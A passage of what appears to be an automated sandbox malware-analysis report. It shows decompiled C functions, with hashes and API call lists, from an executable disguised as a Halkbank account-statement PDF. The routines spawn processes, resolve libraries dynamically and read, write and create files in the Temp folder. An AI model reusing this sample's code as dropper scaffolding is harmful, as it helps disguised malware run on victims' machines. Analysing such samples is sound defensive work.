                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                    • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                    • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                    • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00405C4B(WCHAR* _a4) {
                                                                    				struct _PROCESS_INFORMATION _v20;
                                                                    				int _t7;
                                                                    
                                                                    				0x426750->cb = 0x44;
                                                                    				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
                                                                    				if(_t7 != 0) {
                                                                    					CloseHandle(_v20.hThread);
                                                                    					return _v20.hProcess;
                                                                    				}
                                                                    				return _t7;
                                                                    			}





                                                                    0x00405c54
                                                                    0x00405c74
                                                                    0x00405c7c
                                                                    0x00405c81
                                                                    0x00000000
                                                                    0x00405c87
                                                                    0x00405c8b

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID:
                                                                    • API String ID: 3712363035-0
                                                                    • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                    • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                                    • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                    • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00406A35(signed int _a4) {
                                                                    				struct HINSTANCE__* _t5;
                                                                    				signed int _t10;
                                                                    
                                                                    				_t10 = _a4 << 3;
                                                                    				_t8 =  *(_t10 + 0x40a410);
                                                                    				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                                    				if(_t5 != 0) {
                                                                    					L2:
                                                                    					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                                    				}
                                                                    				_t5 = E004069C5(_t8); // executed
                                                                    				if(_t5 == 0) {
                                                                    					return 0;
                                                                    				}
                                                                    				goto L2;
                                                                    			}





                                                                    0x00406a3d
                                                                    0x00406a40
                                                                    0x00406a47
                                                                    0x00406a4f
                                                                    0x00406a5b
                                                                    0x00000000
                                                                    0x00406a62
                                                                    0x00406a52
                                                                    0x00406a59
                                                                    0x00000000
                                                                    0x00406a6a
                                                                    0x00000000

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                      • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                      • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                      • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2547128583-0
                                                                    • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                    • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                    • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                    • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 68%
                                                                    			E00406158(WCHAR* _a4, long _a8, long _a12) {
                                                                    				signed int _t5;
                                                                    				void* _t6;
                                                                    
                                                                    				_t5 = GetFileAttributesW(_a4); // executed
                                                                    				asm("sbb ecx, ecx");
                                                                    				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                    				return _t6;
                                                                    			}





                                                                    0x0040615c
                                                                    0x00406169
                                                                    0x0040617e
                                                                    0x00406184

                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 415043291-0
                                                                    • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                    • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                    • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                    • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00406133(WCHAR* _a4) {
                                                                    				signed char _t3;
                                                                    				signed char _t7;
                                                                    
                                                                    				_t3 = GetFileAttributesW(_a4); // executed
                                                                    				_t7 = _t3;
                                                                    				if(_t7 != 0xffffffff) {
                                                                    					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                                                                    				}
                                                                    				return _t7;
                                                                    			}





                                                                    0x00406138
                                                                    0x0040613e
                                                                    0x00406143
                                                                    0x0040614c
                                                                    0x0040614c
                                                                    0x00406155

                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                    • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                    • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                    • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                    • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00405C16(WCHAR* _a4) {
                                                                    				int _t2;
                                                                    
                                                                    				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                    				if(_t2 == 0) {
                                                                    					return GetLastError();
                                                                    				}
                                                                    				return 0;
                                                                    			}




                                                                    0x00405c1c
                                                                    0x00405c24
                                                                    0x00000000
                                                                    0x00405c2a
                                                                    0x00000000

                                                                    APIs
                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                    • GetLastError.KERNEL32 ref: 00405C2A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1375471231-0
                                                                    • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                    • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                    • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                    • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040620A(void* _a4, void* _a8, long _a12) {
                                                                    				int _t7;
                                                                    				long _t11;
                                                                    
                                                                    				_t11 = _a12;
                                                                    				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                    				if(_t7 == 0 || _t11 != _a12) {
                                                                    					return 0;
                                                                    				} else {
                                                                    					return 1;
                                                                    				}
                                                                    			}





                                                                    0x0040620e
                                                                    0x0040621e
                                                                    0x00406226
                                                                    0x00000000
                                                                    0x0040622d
                                                                    0x00000000
                                                                    0x0040622f

                                                                    APIs
                                                                    • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00413D44,0040CEF0,00403579,0040CEF0,00413D44,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                    • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                    • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004061DB(void* _a4, void* _a8, long _a12) {
                                                                    				int _t7;
                                                                    				long _t11;
                                                                    
                                                                    				_t11 = _a12;
                                                                    				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                    				if(_t7 == 0 || _t11 != _a12) {
                                                                    					return 0;
                                                                    				} else {
                                                                    					return 1;
                                                                    				}
                                                                    			}





                                                                    0x004061df
                                                                    0x004061ef
                                                                    0x004061f7
                                                                    0x00000000
                                                                    0x004061fe
                                                                    0x00000000
                                                                    0x00406200

                                                                    APIs
                                                                    • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                    • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                    • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                    • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004035F8(long _a4) {
                                                                    				long _t2;
                                                                    
                                                                    				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                    				return _t2;
                                                                    			}




                                                                    0x00403606
                                                                    0x0040360c

                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                    • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                    • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                    • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 78%
                                                                    			E00401FA4() {
                                                                    				void* _t9;
                                                                    				char _t13;
                                                                    				void* _t15;
                                                                    				void* _t17;
                                                                    				void* _t20;
                                                                    				void* _t22;
                                                                    
                                                                    				_t19 = E00402DA6(_t15);
                                                                    				E004056CA(0xffffffeb, _t7);
                                                                    				_t9 = E00405C4B(_t19); // executed
                                                                    				_t20 = _t9;
                                                                    				if(_t20 == _t15) {
                                                                    					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                    				} else {
                                                                    					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                                    						_t13 = E00406AE0(_t17, _t20); // executed
                                                                    						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                                    							if(_t13 != _t15) {
                                                                    								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                    							}
                                                                    						} else {
                                                                    							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                                    						}
                                                                    					}
                                                                    					_push(_t20);
                                                                    					CloseHandle();
                                                                    				}
                                                                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
                                                                    				return 0;
                                                                    			}









                                                                    0x00401faa
                                                                    0x00401faf
                                                                    0x00401fb5
                                                                    0x00401fba
                                                                    0x00401fbe
                                                                    0x0040292e
                                                                    0x00401fc4
                                                                    0x00401fc7
                                                                    0x00401fca
                                                                    0x00401fd2
                                                                    0x00401fe1
                                                                    0x00401fe3
                                                                    0x00401fe3
                                                                    0x00401fd4
                                                                    0x00401fd8
                                                                    0x00401fd8
                                                                    0x00401fd2
                                                                    0x00401fea
                                                                    0x00401feb
                                                                    0x00401feb
                                                                    0x00402c2d
                                                                    0x00402c39

                                                                    APIs
                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                      • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                                      • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                      • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                      • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                                      • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2972824698-0
                                                                    • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                                    • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                                    • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                                    • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 95%
                                                                    			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                    				struct HWND__* _v8;
                                                                    				long _v12;
                                                                    				struct tagRECT _v28;
                                                                    				void* _v36;
                                                                    				signed int _v40;
                                                                    				int _v44;
                                                                    				int _v48;
                                                                    				signed int _v52;
                                                                    				int _v56;
                                                                    				void* _v60;
                                                                    				void* _v68;
